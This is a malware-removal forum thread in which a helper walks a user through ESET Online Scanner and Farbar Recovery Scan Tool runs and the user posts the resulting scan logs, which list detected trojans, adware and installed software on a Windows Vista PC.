@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.15"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}]
@Denied: (A 2) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0]
@="Shockwave Flash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{FAB3E735-69C7-453B-A446-B6823C6DF1C9}]
@Denied: (A 2) (Everyone)
@=""
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{FAB3E735-69C7-453B-A446-B6823C6DF1C9}\1.0]
@="FlashBroker"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Classes]
"SymbolicLinkValue"=hex(6):5c,00,52,00,45,00,47,00,49,00,53,00,54,00,52,00,59,
   00,5c,00,4d,00,41,00,43,00,48,00,49,00,4e,00,45,00,5c,00,53,00,4f,00,46,00,\
.
Completion time: 2014-09-15  09:59:48
ComboFix-quarantined-files.txt  2014-09-15 15:59
.
Pre-Run: 705,712,214,016 bytes free
Post-Run: 724,784,394,240 bytes free
.
- - End Of File - - DB254995081BEC65809DA3794C673CC2
03BA8F890B47C0BE359A4D5A636D214D
 



#5 aharonov

  • Malware Response Team

Posted 15 September 2014 - 01:37 PM

Ok.


Step 1

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#6 mleehogg

  • Topic Starter

Posted 15 September 2014 - 06:17 PM

ESET Logs:

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=76539011a7ba6a47bde91fda5d32e299
# engine=20166
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-15 11:08:23
# local_time=2014-09-15 05:08:23 (-0700, Mountain Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='Norton Internet Security'
# compatibility_mode=3595 16777213 100 91 282400 173329088 0 0
# compatibility_mode_1=''
# compatibility_mode=5892 16776573 100 100 0 247421209 0 0
# scanned=323895
# found=20
# cleaned=0
# scan_time=8362
sh=97BCCD25561F44E9B13F05F6EEF083C9CE9BA529 ft=1 fh=641f1fb3d2e699c4 vn="Win32/Toolbar.Conduit.Y potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\Conduit\Community Alerts\Alert.dll.vir"
sh=322D36A63709838E21905B9E1E5BCB9C7FAD3A1D ft=1 fh=2b797d85c681691c vn="Win32/Toolbar.Conduit.AC potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\Conduit\CT3309350\plugins\TBVerifier.dll.vir"
sh=7E3ADF617BD3D80329FC4148CF4E819BEA3AACAE ft=1 fh=37b0563bbf495b2d vn="a variant of Win32/Kryptik.CKYO trojan" ac=I fn="C:\ProgramData\Windows Genuine Advantage\{DC3D7A82-550D-4A4F-976B-2286219C3072}\msiexec.exe"
sh=7E3ADF617BD3D80329FC4148CF4E819BEA3AACAE ft=1 fh=37b0563bbf495b2d vn="a variant of Win32/Kryptik.CKYO trojan" ac=I fn="C:\Users\All Users\Windows Genuine Advantage\{DC3D7A82-550D-4A4F-976B-2286219C3072}\msiexec.exe"
sh=438CBE35AFB1F4EDDA2C70A7A77FC9F611529884 ft=0 fh=0000000000000000 vn="Win32/TrojanDownloader.Tracur.V trojan" ac=I fn="C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Users\nkkmebodcglnimjjbopgchmhpbmfdnpk\background.js"
sh=19BF8930EAF23290895C6F617D30677B79AD27C0 ft=0 fh=0000000000000000 vn="JS/Exploit.Agent.NHK trojan" ac=I fn="C:\Users\Guest\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SPJDWC7Y\3lfin8n5yq[1].htm"
sh=609A8BB3EFD8C7EA39F29A06EC30A88F7FC545C3 ft=0 fh=0000000000000000 vn="a variant of Java/Exploit.Agent.QZU trojan" ac=I fn="C:\Users\Guest\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\7315d872-1f7f06ac"
sh=85DA16CD6282C0B0AB7AA2F65BF912ABDD1766A7 ft=0 fh=0000000000000000 vn="JS/Redirector.NCG trojan" ac=I fn="C:\Users\Hogg\AppData\Local\06f3f051-63b1-4d25-bc86-788f5e8250f9.crx"
sh=DCBD329731A2D52E3C9D89A2D5B620A717DA9002 ft=0 fh=0000000000000000 vn="JS/Redirector.NCG trojan" ac=I fn="C:\Users\Hogg\AppData\Local\71A87F04-31A1-11E2-8271-B8AC6F996F26.crx"
sh=991AD5401B96741DB8125572C067E2F7A5CEB399 ft=0 fh=0000000000000000 vn="a variant of Win32/Toolbar.Conduit.AH potentially unwanted application" ac=I fn="C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx"
sh=438CBE35AFB1F4EDDA2C70A7A77FC9F611529884 ft=0 fh=0000000000000000 vn="Win32/TrojanDownloader.Tracur.V trojan" ac=I fn="C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Users\afkgilhfgajhpdmckpbmdgkapgdjndbb\background.js"
sh=EF10F1B08F42B0F700DFCAD97E91A6190C385DF2 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\152478ce-1a9319eb"
sh=B6583F3B5A942335881FE0CE0DB2F32272268A73 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\fe6cc0e-236666be"
sh=B0298BA71B954F01DD98BA45385773D6106CC897 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\68fc9bd3-264ef294"
sh=E5A133CB1754CC1CC37A32F1EF56049D947D0BE5 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\3ed04b5e-6095ae43"
sh=0BCC4A220D6BD8CDA4C76C178B802D0776A37DF3 ft=1 fh=65c2fdbe46c76e1e vn="a variant of Win32/Kryptik.BETW trojan" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\2b29f3a4-47a69334"
sh=57021C424DF16975EF4A725DE83B328CF6BA513F ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\1cffd5ab-36dfccb7"
sh=0E0A69B6D243F8B5C5B38BB9E77F5BE318DD1BE7 ft=0 fh=0000000000000000 vn="a variant of Java/Exploit.Agent.NNO trojan" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\4c3955ab-5dffbce8"
sh=28188520730B91ACFF3F3C3DAF8800B6CC845F23 ft=0 fh=0000000000000000 vn="a variant of Java/Exploit.Agent.NNO trojan" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\58ddf587-35d058fd"
sh=74C4657701153B9CA169F4EEB10A066BABE0CB72 ft=1 fh=73e0ec9670cf02dc vn="Win32/AdvancedSystemProtector.A potentially unwanted application" ac=I fn="C:\Users\Hogg\Downloads\otsaso3setup_11_9_12.exe"
 



#7 mleehogg

  • Topic Starter

Posted 15 September 2014 - 06:23 PM

FRST Logs:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 12-09-2014
Ran by Hogg (administrator) on HOGG-PC on 15-09-2014 17:21:09
Running from C:\Users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J5LL7X0R
Platform: Windows Vista ™ Home Premium Service Pack 2 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe
(RealNetworks, Inc.) C:\Program Files (x86)\real\realplayer\Update\realsched.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Windows\splwow64.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [915512 2009-03-05] (Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => c:\program files (x86)\real\realplayer\Update\realsched.exe [295512 2013-10-23] (RealNetworks, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-09-01] (Apple Inc.)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1486144 2013-05-13] (IObit)
HKU\S-1-5-21-764796802-3477399101-373240229-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-08-12] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe (McAfee, Inc.)
BootExecute: autocheck autochk * bootdelete

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKCU - {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3309350&CUI=UN22661023661384124&UM=2
SearchScopes: HKCU - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL =
SearchScopes: HKCU - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL =
SearchScopes: HKCU - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL =
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.141\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: PasswordBox Helper -> {5DB69B97-934B-451D-94DB-32EF802A01CD} -> C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0552.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {5B291E6C-9A74-4034-971B-A4B007A0B315} -  No File
Toolbar: HKCU - No Name - {B7DE27CA-0626-478A-95D6-6C0804782455} -  No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {1851174C-97BD-4217-A0CC-E908F60D5B7A} http://h20364.www2.hp.com/CSMWeb/Customer/cabs/HPISDataManager.CAB
DPF: HKLM-x32 {20A60F0D-9AFA-4515-A0FD-83BD84642501} http://messenger.zone.msn.com/binary/msgrchkr.cab56986.cab
DPF: HKLM-x32 {5D6F45B3-9043-443D-A792-115447494D24} http://messenger.zone.msn.com/MessengerGamesContent/GameContent/Default/uno1/GAME_UNO1.cab
DPF: HKLM-x32 {6F15128C-E66A-490C-B848-5000B5ABEEAC} https://h20436.www2.hp.com/ediags/dex/secure/HPDEXAXO.cab
DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {8100D56A-5661-482C-BEE8-AFECE305D968} http://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
DPF: HKLM-x32 {C3F79A2B-B9B4-4A66-B012-3EE46475B072} http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Winsock: Catalog5 01 C:\Windows\SysWOW64\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 01 %SystemRoot%\System32\mswsock.dll [304128] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_38 -> C:\Windows\SysWOW64\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @pack.google.com/Google Updater;version=13 -> C:\Program Files (x86)\Google\Google Updater\2.4.1636.7222\npCIDetect13.dll (Google)
FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Hogg\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-07]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2013-01-12]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-10-23]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn [2014-09-15]
FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

Chrome:
=======
CHR Profile: C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-29]
CHR Extension: (Google Wallet) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-10]
CHR HKCU\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\Exts\Chrome.crx [2014-05-01]
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
CHR HKLM-x32\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 DTSRVC; C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe [69632 2008-06-24] () [File not signed]
R2 ezSharedSvc; C:\Windows\SysWOW64\ezsvc7.dll [129992 2008-02-03] (EasyBits Sofware AS) [File not signed]
